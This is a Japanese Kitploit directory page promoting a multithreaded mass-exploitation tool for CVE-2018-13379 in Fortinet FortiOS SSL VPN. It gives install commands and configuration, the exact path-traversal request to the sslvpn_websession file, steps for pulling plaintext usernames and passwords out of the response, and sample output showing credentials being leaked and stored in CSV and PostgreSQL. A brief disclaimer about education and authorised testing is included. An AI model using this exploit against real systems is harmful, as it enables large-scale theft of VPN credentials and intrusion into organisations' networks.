Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 のマスエクスプロイター(Fortinet FortiOS SSL VPN 向け)。認証情報を即座に抽出し、CSV + PostgreSQL に保存。マルチスレッド対応、無駄な警告なし。 | Kitploit
ツール/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストレッドチーミング
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-13379 のマスエクスプロイター(Fortinet FortiOS SSL VPN 向け)。認証情報を即座に抽出し、CSV + PostgreSQL に保存。マルチスレッド対応、無駄な警告なし。

リポジトリを見る
123ヶ月前未レビュー

preview

CVE-2018-13379 — Fortinet FortiOS SSL VPN 用マスエクスプロイト

Fortinet FortiOS SSL VPN の CVE-2018-13379(パストラバーサル)の脆弱性を悪用するマスエクスプロイトツール。セッションファイルを読み取り、ログインIDとパスワードを平文で抽出できます。

特徴

  • /remote/fgt_lang エンドポイントを介した CVE-2018-13379 の悪用
  • マルチスレッド(デフォルト20スレッド)
  • 発見した認証情報を CSV と PostgreSQL に即座に保存
  • PostgreSQL の動的テーブル名にタイムスタンプを使用(fortios_creds_20250120_143052)
  • 警告なし — 結果のみを表示

インストール

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

設定

すべての設定はスクリプト内で直接編集できます — コマンドライン引数をいじる必要はありません:

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL(オプション - データベースなしでも動作します)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

使用方法

  1. ターゲットを1行に1つずつ記述したファイル targets.txt を作成します:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. スクリプトを実行します:
root@kitploit:~
python3 exploit.py

結果

  • CSVファイル — 発見したすべての認証情報(タイムスタンプ付き)
  • PostgreSQLテーブル — 実行のたびに新しいテーブルが作成されます(fortios_creds_YYYYMMDD_HHMMSS)

出力例:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

動作の仕組み

  1. https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession にGETリクエストを送信します
  2. レスポンスに文字列 var fgt_lang(脆弱性のサイン)が含まれているか確認します
  3. バイナリレスポンスから username と password のペアを抽出します
  4. 見つかったデータを即座に CSV と PostgreSQL に保存します
  5. 次のターゲットに移動します。

要件

  • Python 3.6+
  • requests
  • psycopg2-binary(オプション - これがない場合はCSVファイルのみで動作)
  • urllib3

警告

このツールは教育目的および認可されたテストを目的としています。使用による結果はすべて自己責任です。

謝辞

  • 元の脆弱性は Meh Chang によって発見されました
  • 悪用ロジックは公開されている研究に基づいています

ライセンス

Unlicense - ご自由にどうぞ。

ツールをダウンロード